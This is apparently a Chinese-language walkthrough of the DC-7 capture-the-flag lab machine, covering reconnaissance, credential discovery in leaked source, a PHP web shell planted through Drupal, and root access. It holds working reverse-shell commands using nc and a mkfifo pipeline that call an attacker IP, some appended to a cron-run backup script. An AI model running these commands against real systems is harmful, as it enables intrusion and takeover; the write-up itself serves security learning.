靶机-DC7

arp-scan找到靶机IP

靶机-DC7_第1张图片

masscan扫描IP端口

靶机-DC7_第2张图片

nmap渗透扫描

靶机-DC7_第3张图片

目录扫描

靶机-DC7_第4张图片

访问主页http://192.168.253.139/

靶机-DC7_第5张图片

指纹

靶机-DC7_第6张图片

http://192.168.253.139/robots.txt

靶机-DC7_第7张图片

http://192.168.253.139/README.txt

靶机-DC7_第8张图片

http://192.168.253.139/web.config

靶机-DC7_第9张图片

找了一遍没找到可利用点,最后

靶机-DC7_第10张图片

发现在Github上可以下载对应的源码

从github上面找到了源代码,里面的config.php(配置文件)就有密码。


ssh连接

靶机-DC7_第11张图片

查看当前目录下文件

backups下是两个加密文件

打开mbox文件,发现是一个计划任务,定时备份,并且备份目录执行的源码在/opt/scripts目录下

靶机-DC7_第12张图片

查看这个计划任务

靶机-DC7_第13张图片

发现想用drush管理一个网站,那么就必须先跳转到那个网站的目录下。更改密码

cd /var/www/html
drush user-password admin --password="admin"

登录

靶机-DC7_第14张图片

在Content—>Add content–>Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

靶机-DC7_第15张图片

最后安装启用

靶机-DC7_第16张图片
靶机-DC7_第17张图片

靶机-DC7_第18张图片

点击home ——> Edit进行编辑

靶机-DC7_第19张图片

选择php添加一句话

靶机-DC7_第20张图片

保存后直接主页连接蚁剑

靶机-DC7_第21张图片

打开root发现没权限,提权

反弹shell

nc -e /bin/bash 192.168.253.129 8080

在这里插入图片描述

python获取shell交互界面
python -c ‘import pty;pty.spawn(“/bin/bash”)’

靶机-DC7_第22张图片

当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

echo "nc -e /bin/bash 192.168.56.108 4444" >>backups.sh

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.253.129 4444 >/tmp/f" >> backups.sh

靶机-DC7_第23张图片

获得root权限,找到flag

靶机-DC7_第24张图片

你可能感兴趣的:(靶机,网络,安全)